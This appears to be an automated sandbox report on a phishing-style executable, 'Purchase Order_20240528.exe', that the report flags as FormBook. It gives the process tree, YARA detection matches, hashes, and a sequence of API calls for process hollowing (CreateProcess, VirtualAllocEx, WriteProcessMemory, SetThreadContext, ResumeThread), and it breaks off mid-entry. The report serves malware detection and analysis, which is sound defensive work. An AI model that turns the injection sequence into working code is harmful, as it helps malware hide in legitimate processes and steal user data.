                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:18:58.062290907 CEST | 408 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:18:58 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo="}</script></head></html>



                                Target ID:0
                                Start time:01:14:50
                                Start date:28/05/2024
                                Path:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_20240528.exe"
                                Imagebase:0x3f0000
                                File size:729'608 bytes
                                MD5 hash:B6422C6C56CDAB2A43415FDCCEEAF3E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:01:14:52
                                Start date:28/05/2024
                                Path:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Purchase Order_20240528.exe"
                                Imagebase:0xaa0000
                                File size:729'608 bytes
                                MD5 hash:B6422C6C56CDAB2A43415FDCCEEAF3E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                Target ID:4
                                Start time:01:14:57
                                Start date:28/05/2024
                                Path:C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe"
                                Imagebase:0x3a0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:5
                                Start time:01:14:58
                                Start date:28/05/2024
                                Path:C:\Windows\SysWOW64\nslookup.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\nslookup.exe"
                                Imagebase:0x2a0000
                                File size:77'824 bytes
                                MD5 hash:9D2EB13476B126CB61B12CDD03C7DCA6
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                Target ID:7
                                Start time:01:15:12
                                Start date:28/05/2024
                                Path:C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe"
                                Imagebase:0x3a0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:9
                                Start time:01:15:25
                                Start date:28/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff728280000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:7.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:155
                                  Total number of Limit Nodes:8

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D7FE
                                  • GetCurrentThread.KERNEL32 ref: 00E1D83B
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D878
                                  • GetCurrentThreadId.KERNEL32 ref: 00E1D8D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 29555305a678b98900ab1508c19c913dbefa368b803b5c2cf17a79bee762931e
                                  • Instruction ID: 36a88fd954b663b80647e96891b901c6ec8cb67eccda6db6a272b8fc8b7e0547
                                  • Opcode Fuzzy Hash: 29555305a678b98900ab1508c19c913dbefa368b803b5c2cf17a79bee762931e
                                  • Instruction Fuzzy Hash: 685168B09003499FDB58DFA9D948BEEBBF1EF88314F208459E009B7350DB74A944CB61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D14EE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 58e96229da6607bd69782306d8c4f99a79cb53dda79d8662c031f607f1386287
                                  • Instruction ID: bc3567f9eff5ee621267ef4237411c738477beb086a3879055dc7783795e1565
                                  • Opcode Fuzzy Hash: 58e96229da6607bd69782306d8c4f99a79cb53dda79d8662c031f607f1386287
                                  • Instruction Fuzzy Hash: 7AA14C71D00259DFEF60DFA8D841BDDBBF2AF48310F148569E818AB280DBB49985CF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D14EE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: fc7c196d80023a69afd84646348c8faf055cd958e13b37f022b8670ba0bc45b9
                                  • Instruction ID: 27c7052544e9e35c5f2a70b3345ecdb06c838c5eff383f07e3e2635769365fdb
                                  • Opcode Fuzzy Hash: fc7c196d80023a69afd84646348c8faf055cd958e13b37f022b8670ba0bc45b9
                                  • Instruction Fuzzy Hash: DC913A71D00259DFEF60DFA8D841BDDBBF2AF48310F148569E818AB280DBB49985CF91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 147 e15a64-e15af4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bc1a31e3ed45f874904ad9dcd0e4a9ea77b42c482e0757e8a93aaad8534bb52
                                  • Instruction ID: 0a2f0d9bd3741a6e24d440475e201ed507cdc5c1aa5d11d236bebdb7344a63ba
                                  • Opcode Fuzzy Hash: 9bc1a31e3ed45f874904ad9dcd0e4a9ea77b42c482e0757e8a93aaad8534bb52
                                  • Instruction Fuzzy Hash: 9E31AB72804A48CFDF11CFA8C8457EDBBF1AF86318F54958AC0256B251C775A986CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 e144b0-e159b9 CreateActCtxA 154 e159c2-e15a1c 150->154 155 e159bb-e159c1 150->155 162 e15a2b-e15a2f 154->162 163 e15a1e-e15a21 154->163 155->154 164 e15a31-e15a3d 162->164 165 e15a40 162->165 163->162 164->165 167 e15a41 165->167 167->167
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ddb98214ec9aded8525e13e20d8c6eb977d9aee5ea946b68ac58574d0331b8d7
                                  • Instruction ID: 2aa123580da5a43c19f03d6560ce3a1b387574302c51c92178880b4e4eee6964
                                  • Opcode Fuzzy Hash: ddb98214ec9aded8525e13e20d8c6eb977d9aee5ea946b68ac58574d0331b8d7
                                  • Instruction Fuzzy Hash: 6A41C0B1D00719CBEB24DFAAC9447DDBBB6BF88704F20816AD408BB251DB756945CF90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 168 e158f5-e1596c 169 e1596f-e159b9 CreateActCtxA 168->169 171 e159c2-e15a1c 169->171 172 e159bb-e159c1 169->172 179 e15a2b-e15a2f 171->179 180 e15a1e-e15a21 171->180 172->171 181 e15a31-e15a3d 179->181 182 e15a40 179->182 180->179 181->182 184 e15a41 182->184 184->184
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: cf1d7c142a487dbb270edf48b25be07f157f3973d05858fce4f48a9d93cdc013
                                  • Instruction ID: b772ca58fefdc0858af902ef20586aab53e2bccfb47757451fc08a201057257b
                                  • Opcode Fuzzy Hash: cf1d7c142a487dbb270edf48b25be07f157f3973d05858fce4f48a9d93cdc013
                                  • Instruction Fuzzy Hash: 0941B0B1C00719CBDB24DFAAC9847DDBBF6BF88704F20816AD418AB251DB756945CF50

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 185 6d14a20-6d14a76 188 6d14a86-6d14ac5 WriteProcessMemory 185->188 189 6d14a78-6d14a84 185->189 191 6d14ac7-6d14acd 188->191 192 6d14ace-6d14afe 188->192 189->188 191->192
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D14AB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: bd774f79a4402f40b89597e67b50b82ca419a002d254719af90887dc5612b5eb
                                  • Instruction ID: 7170d584122b5261b20824a281c659725a197df3abd554575842ac7be153150d
                                  • Opcode Fuzzy Hash: bd774f79a4402f40b89597e67b50b82ca419a002d254719af90887dc5612b5eb
                                  • Instruction Fuzzy Hash: 84215771900349DFDB10DFA9D881BDEBBF5FF48310F10842AE958A7240C7789550CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 6d14a28-6d14a76 198 6d14a86-6d14ac5 WriteProcessMemory 196->198 199 6d14a78-6d14a84 196->199 201 6d14ac7-6d14acd 198->201 202 6d14ace-6d14afe 198->202 199->198 201->202
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D14AB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 0eda8689d4a406516d163ca37d8545ec8057925ae5121222480134e0bcc51cc1
                                  • Instruction ID: c86375fe9bfabf77b3ebe4884cda2c8355c533ace8452d811447c6d17b3563ea
                                  • Opcode Fuzzy Hash: 0eda8689d4a406516d163ca37d8545ec8057925ae5121222480134e0bcc51cc1
                                  • Instruction Fuzzy Hash: 222124719003499FDB50CFAAD981BDEBBF5FF48324F10842AE918A7240D7B89950CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 218 6d14b11-6d14ba5 ReadProcessMemory 222 6d14ba7-6d14bad 218->222 223 6d14bae-6d14bde 218->223 222->223
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D14B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: cf6677fa6f79668117bcc469810aeec79909072535a79f9d49abaadf5fd2b985
                                  • Instruction ID: 35f89778222832b374e4ba62b9e46f4ead588e38d513a92dd15b29348c83d85d
                                  • Opcode Fuzzy Hash: cf6677fa6f79668117bcc469810aeec79909072535a79f9d49abaadf5fd2b985
                                  • Instruction Fuzzy Hash: 4E2125B18003499FDB10DFAAC881BEEFBF5FF48320F10842AE558A7240C7789511DBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 206 6d14888-6d1488a 207 6d14890-6d148db 206->207 208 6d1488c-6d1488f 206->208 210 6d148eb-6d1491b Wow64SetThreadContext 207->210 211 6d148dd-6d148e9 207->211 208->207 213 6d14924-6d14954 210->213 214 6d1491d-6d14923 210->214 211->210 214->213
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1490E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: e309ef34a67e5ee6cfad5136336225cfd604c52dd32d19c72ac45cd47a27175f
                                  • Instruction ID: d1eb56e4d30a39e0ccf02e21ed613e436ee7b99bde8e45df03ac08117b284166
                                  • Opcode Fuzzy Hash: e309ef34a67e5ee6cfad5136336225cfd604c52dd32d19c72ac45cd47a27175f
                                  • Instruction Fuzzy Hash: 82217AB1D003499FDB10CFAAD8817EEBBF4AF88324F148429D458A7240C7B89545CBA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 237 6d14b18-6d14ba5 ReadProcessMemory 240 6d14ba7-6d14bad 237->240 241 6d14bae-6d14bde 237->241 240->241
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D14B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 508d650b6baceae27c14f53604dbe006117f6afba0a7ad99248f7f9a60d2864a
                                  • Instruction ID: d0e5a9f6e15e871edf7f1247af37a0c88e6acc9242802df010ff627383d48a0c
                                  • Opcode Fuzzy Hash: 508d650b6baceae27c14f53604dbe006117f6afba0a7ad99248f7f9a60d2864a
                                  • Instruction Fuzzy Hash: 402125B18003499FDF10DFAAC981BEEBBF5FF48320F10842AE519A7240C7789910CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 227 6d14890-6d148db 229 6d148eb-6d1491b Wow64SetThreadContext 227->229 230 6d148dd-6d148e9 227->230 232 6d14924-6d14954 229->232 233 6d1491d-6d14923 229->233 230->229 233->232
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1490E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 60f241520b031cfb9fcb004fbf2a3cfef1c385ca79b9dee2d4640b52dbfad081
                                  • Instruction ID: 5b6a385e39a8c3db3f45961b81d29ae8cb91ba46b627088bec54c45bcf5cfae5
                                  • Opcode Fuzzy Hash: 60f241520b031cfb9fcb004fbf2a3cfef1c385ca79b9dee2d4640b52dbfad081
                                  • Instruction Fuzzy Hash: 5D213871D003099FDB10DFAAC4857EEBBF4EF88324F14842AD559A7240CBB89944CFA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 245 e1d9c8-e1da5c DuplicateHandle 246 e1da65-e1da82 245->246 247 e1da5e-e1da64 245->247 247->246
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1DA4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 8a906a5d186816f130ec626f1e699768584620731f45e7cf43ad013eb805777d
                                  • Instruction ID: e2f56778e8b8722361f8da9a00b4d8c9157692ae201fa10874ef531269534646
                                  • Opcode Fuzzy Hash: 8a906a5d186816f130ec626f1e699768584620731f45e7cf43ad013eb805777d
                                  • Instruction Fuzzy Hash: CB21C4B5904249DFDB10CF9AD984ADEBBF4FF48320F14841AE958A3350D378A954CF65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 250 6d14960-6d149e3 VirtualAllocEx 254 6d149e5-6d149eb 250->254 255 6d149ec-6d14a11 250->255 254->255
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D149D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: db2481fb9a10985a2fbffc1842643dc42fe67fd426abfd193c2fc7d11a6b850a
                                  • Instruction ID: 94195cc351b1a81ae99e2d29b8f828221dba6304dce3d40555ab2465d8cc98ff
                                  • Opcode Fuzzy Hash: db2481fb9a10985a2fbffc1842643dc42fe67fd426abfd193c2fc7d11a6b850a
                                  • Instruction Fuzzy Hash: CD1156728003499FDB20DFAAD841BDFBFF5AF88320F208419E559AB250C7759550CBA1
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B7B9,00000800,00000000,00000000), ref: 00E1B9CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: cc5db97726f0187a8957f06e08416c4047900e7b6026ddeed4d8c621f63206f7
                                  • Instruction ID: c0373f9337698c288f52c1e0311dd211391ab755803ff7748b2fb168f6f1f5a2
                                  • Opcode Fuzzy Hash: cc5db97726f0187a8957f06e08416c4047900e7b6026ddeed4d8c621f63206f7
                                  • Instruction Fuzzy Hash: 571114B69003499FDB10CF9AC484BDEFBF4EB88314F10842AE519B7200C3B9A945CFA5
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D149D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: c39763c25eb0fc1c07fab2a36d61b839c36ff50918fb230509eccfed0251f43d
                                  • Instruction ID: 41ac96a919230f7aac860add7e04f1692526f6367b33ed501e312eb7109b6d45
                                  • Opcode Fuzzy Hash: c39763c25eb0fc1c07fab2a36d61b839c36ff50918fb230509eccfed0251f43d
                                  • Instruction Fuzzy Hash: 521156728002499FDB10DFAAC845BDFBBF5AF88320F20841AE519A7250C775A910CBA0
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B7B9,00000800,00000000,00000000), ref: 00E1B9CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 0b41a348b36edd999cab799deb1c07dc887736d84f56f47a7e9d5d12bf35b47f
                                  • Instruction ID: 2d2c99d7e5a32e2ccab9d239c97f43d09da87aebf1567ed5ccf6d84226f02ee8
                                  • Opcode Fuzzy Hash: 0b41a348b36edd999cab799deb1c07dc887736d84f56f47a7e9d5d12bf35b47f
                                  • Instruction Fuzzy Hash: 7711F3B68002498FDB10CF9AD484ADEFBF4EB88724F10842AD559B7200C3B9A945CFA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: dd39d01b8adcf9c687e7cc1ab6cf7e2ad3dc6606204e2ce7e7ab8fa7055b5a96
                                  • Instruction ID: 026021c442f14ef1f431a966804bf2757ead61221fb755b33c1aa26959509641
                                  • Opcode Fuzzy Hash: dd39d01b8adcf9c687e7cc1ab6cf7e2ad3dc6606204e2ce7e7ab8fa7055b5a96
                                  • Instruction Fuzzy Hash: C51176B1900349CFDB20DFAAD844BDFFBF4AF88324F208419D119A7240CBB9A400CBA4
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06D18909,?,?), ref: 06D18AB0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 87f979aa9dc0d3bba8c03b5ac11be3434e6a87e96436b99d8e02caff0ae0875c
                                  • Instruction ID: 1ac768bffe6dfa7541ad66fcab7215c5317efad8e935173bb4409fa3a4fe309d
                                  • Opcode Fuzzy Hash: 87f979aa9dc0d3bba8c03b5ac11be3434e6a87e96436b99d8e02caff0ae0875c
                                  • Instruction Fuzzy Hash: F01143B2800649DFCB60CF9AD844BDEBBF4EB48320F24841AD558A7340D778A584CFA1
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06D18909,?,?), ref: 06D18AB0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 494969318c7f43f9cfcc7038b838db07c35e4ee545718bf29de5fff20eb89690
                                  • Instruction ID: 7f7c98e851557cf0ea8488bddb5d5e71b591c4320501d463360b39b0204009ac
                                  • Opcode Fuzzy Hash: 494969318c7f43f9cfcc7038b838db07c35e4ee545718bf29de5fff20eb89690
                                  • Instruction Fuzzy Hash: E81125B1800349DFDB60DF9AD444BEEBBF4EB48320F20845AD958A7340D7B8A944CFA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D16F85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: e64c31e262a91fcce6677f45d79a7517e774cc35a94cc7d1003267b9f7a5a46b
